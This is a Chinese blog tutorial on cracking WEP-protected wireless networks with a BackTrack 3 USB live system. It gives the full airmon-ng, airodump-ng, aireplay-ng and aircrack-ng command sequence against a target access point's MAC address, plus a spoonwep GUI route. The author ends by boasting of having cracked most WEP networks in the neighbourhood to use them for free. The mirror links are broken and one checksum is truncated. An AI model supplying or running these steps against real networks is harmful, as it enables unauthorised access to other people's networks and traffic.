backtrack3(BT3) usb版 破解WEP无线网络密码详细步骤

2024年5月31日发(作者：)

backtrack3(BT3) usb版 破解WEP无线网络密码详细步骤

2009年04月07日 星期二 上午 09:53

一、先开始制作启动U盘：将下载好的backtrack3(BT3) usb版(下载地址在文章末尾)文件

直接解压到U盘（1G以上容量）。把Boot 和BT3两个文件夹放到U盘的根目

录，打开BOOT文件夹双击运行" "批处理文件。U盘里就会多出4个文件."

" "" " " "" （如果想要中文截面的BT3

的菜单,就在下载BT3中文语言包。）

二、之后重启 windows 进入BIOS设置，把BIOS里的frist boot device设置为USB-HDD（或

者是USB--ZIP）再重启选择从usb启动。系统进入backtrack3 系统。

三、现在开始破解

1.在shell窗口中输入 ifconfig 命令 ，出现如下信息：

lo no wireless extensions.

eth0 no wireless extensions.

eth1 IEEE 802.11g ESSID:"" Nickname:""

Mode:（......）Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82

Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3

Retry:off RTS thr:off Fragment thr:off

Encryption key:off

Power Management:off

Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0

2.找出你的无线网卡名字，我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng

start eth1 11)。再输入 ifconfig 命令 ，返回如下信息：

lo no wireless extensions.

eth0 no wireless extensions.

eth1 IEEE 802.11g ESSID:"" Nickname:""

Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82

Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3

Retry:off RTS thr:off Fragment thr:off

Encryption key:off

Power Management:off

Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0

3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.

命令中的11 表示要破解的频道号，bssid后面的数字表示破解目标的MAC物理地址，outputs

表示要生成的包的名称。回车运行。

4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h

00:A1:C1:D8:A5:B6 eth1

其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地

址，00:A1:C1:D8:A5:B6表示本机网卡MAC物理地址

5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1

获取更多的数据包。

6.返回数据量到1万的时候就可以破解了。再开一个shell输入 aircrack-ng -z -b

00:1A:01:8D:C3:B2 进行破解。如果破解不成功，让它继续抓包，直到破解。

BackTrack 3 Beta 光盘版 (Stripped Down - 700 mb)可装到硬盘

/t

/

ftp:///

md5 : 04ed8742fc8facd1ecc8c9f6f567c116

sha1 : 70c33e0aa75a978b8a87a207bf488ecec8d10a87

BackTrack 3 Beta U盘版(946 mb)只能用在U盘

/t

/

ftp:///

md5 : bd0d8f5b187f5a39288df

sha1: 853b80a77e3881e8084c797ba55077ead15f84ae

补：

BT3启动过程。用户名root，密码toor，输入startx启动图形界面。

输入： root 回车

toor 回车

startx 回车 （之前要输入xconf，BT4不用输入）

运行spoonwep选择信号比较好的AP进行破解，不一定一次成功，同一个AP可

不同时段多试几次。

图为破解到的密码：123456789B。

WEP加密的密码如果是十六进制就是10位，ASCII形式就是5位，每个段前面

是3，取后面。

第一次破到的密码是 31：32：33：34：35，实际密码为12345。。。汗，费了

那么大劲。

小区里信号还可以用的WEP基本都已破解，蹭网的感觉„„爽。